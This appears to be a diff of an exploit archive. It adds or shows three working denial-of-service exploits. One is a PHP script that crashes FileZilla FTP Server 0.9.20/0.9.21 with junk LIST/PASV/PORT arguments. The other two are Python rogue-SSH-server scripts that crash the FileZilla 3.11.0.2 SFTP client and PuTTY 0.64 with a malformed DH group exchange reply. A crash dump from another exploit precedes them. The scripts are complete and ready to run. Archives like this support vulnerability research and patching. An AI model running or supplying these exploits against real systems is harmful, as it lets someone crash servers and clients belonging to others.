Exception C0000005 (ACCESS_VIOLATION writing [0000007C]) Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
---------------------------------------------------------------- ----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00 EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00 EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00 ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05 EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
--> MOV BYTE PTR [ESI+7C],01 --> MOV BYTE PTR [ESI+7C],01
---------------------------------------------------------------- ----------------------------------------------------------------
07:04:28.330 pid=0F84 tid=0104 Thread exited with code 3221225477 07:04:28.330 pid=0F84 tid=0104 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=0F18 Thread exited with code 3221225477 07:04:28.380 pid=0F84 tid=0F18 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=03A0 Thread exited with code 3221225477 07:04:28.380 pid=0F84 tid=03A0 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=04E4 Thread exited with code 3221225477 07:04:28.380 pid=0F84 tid=04E4 Thread exited with code 3221225477
07:04:28.390 pid=0F84 tid=053C Thread exited with code 3221225477 07:04:28.390 pid=0F84 tid=053C Thread exited with code 3221225477
07:04:28.390 pid=0F84 tid=0780 Process exited with code 3221225477 07:04:28.390 pid=0F84 tid=0780 Process exited with code 3221225477
*/ */
?> ?>
# milw0rm.com [2006-12-09] # milw0rm.com [2006-12-09]

134
platforms/windows/dos/2914.php
View file

@ -1,67 +1,67 @@
<?php <?php
# Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service # Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service
# by shinnai # by shinnai
# mail: shinnai[at]autistici[dot[org] # mail: shinnai[at]autistici[dot[org]
# site: http://shinnai.altervista.org # site: http://shinnai.altervista.org
# #
# special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html # special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html
# and for code in php I never could write alone ;) # and for code in php I never could write alone ;)
# This one works fine also with an user with only read and list permissions enabled # This one works fine also with an user with only read and list permissions enabled
# you can change the LIST command also with NLST or NLST -al comamnds # you can change the LIST command also with NLST or NLST -al comamnds
# tested on Windows XP Professional SP2 all patched # tested on Windows XP Professional SP2 all patched
error_reporting(E_ALL); error_reporting(E_ALL);
$service_port = getservbyname('ftp', 'tcp'); $service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('127.0.0.1'); $address = gethostbyname('127.0.0.1');
$user="test"; $user="test";
$pass="test"; $pass="test";
$junk.="A*"; $junk.="A*";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) { if ($socket < 0) {
echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n"; echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else { } else {
echo "OK.\n"; echo "OK.\n";
} }
$result = socket_connect($socket, $address, $service_port); $result = socket_connect($socket, $address, $service_port);
if ($result < 0) { if ($result < 0) {
echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n"; echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else { } else {
echo "OK.\n"; echo "OK.\n";
} }
$out=socket_read($socket, 240); $out=socket_read($socket, 240);
echo $out; echo $out;
$in = "USER ".$user."\r\n"; $in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80); $out=socket_read($socket, 80);
echo $out; echo $out;
$in = "PASS ".$pass."\r\n"; $in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80); $out=socket_read($socket, 80);
echo $out; echo $out;
$in = "PASV ".$junk."\r\n"; $in = "PASV ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$in = "PORT ".$junk."\r\n"; $in = "PORT ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$in = "LIST ".$junk."\r\n"; $in = "LIST ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
socket_close($socket); socket_close($socket);
?> ?>
# milw0rm.com [2006-12-11] # milw0rm.com [2006-12-11]

71
platforms/windows/dos/37286.py Executable file
View file

@ -0,0 +1,71 @@
'''
# Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability
# Date: 5-6-2015
# Vendor homepage: http://www.chiark.greenend.org.uk
# Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe
# Version: 3.11.0.2
# Author: 3unnym00n
# Details:
# --------
# sftp module for filezilla based on putty's psftp component.
# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash
# Tested On: win7, xp
# operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1
'''
import socket
import struct
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(('127.0.0.1', 22))
soc.listen(1)
client, addr = soc.accept()
## do banner exchange
## send server banner
client.send('SSH-2.0-SUCK\r\n')
## recv client banner
client_banner = ''
while True:
data = client.recv(1)
if data == '\x0a':
break
client_banner += data
print 'the client banner is: %s'%client_banner.__repr__()
## do key exchange
## recv client algorithms
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send server algorithms
client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex'))
## do dh key exchange
## recv dh group exchange request
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange group
client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex'))
## recv dh group exchange init
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange reply
dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
dh_gex_reply_msg += '\x09' ## padding len
dh_gex_reply_msg += '\x21' ## dh gex reply
dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
dh_gex_reply_msg += 'A'*600
client.sendall(dh_gex_reply_msg)

70
platforms/windows/dos/37291.py Executable file
View file

@ -0,0 +1,70 @@
'''
# Exploit title: putty v0.64 denial of service vulnerability
# Date: 5-6-2015
# Vendor homepage: http://www.chiark.greenend.org.uk
# Software Link: http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.64-installer.exe
# Version: 0.64
# Author: 3unnym00n
# Details:
# --------
# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the putty crash
# Tested On: win7, xp
# operating steps: run the py, then execute : "D:\programfile\PuTTYlatest\putty.exe" -ssh root@127.0.0.1
'''
import socket
import struct
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(('127.0.0.1', 22))
soc.listen(1)
client, addr = soc.accept()
## do banner exchange
## send server banner
client.send('SSH-2.0-paramiko_1.16.0\r\n')
## recv client banner
client_banner = ''
while True:
data = client.recv(1)
if data == '\x0a':
break
client_banner += data
print 'the client banner is: %s'%client_banner.__repr__()
## do key exchange
## recv client algorithms
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send server algorithms
client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex'))
## do dh key exchange
## recv dh group exchange request
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange group
client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex'))
## recv dh group exchange init
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange reply
dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
dh_gex_reply_msg += '\x09' ## padding len
dh_gex_reply_msg += '\x21' ## dh gex reply
dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
dh_gex_reply_msg += 'A'*600
client.sendall(dh_gex_reply_msg)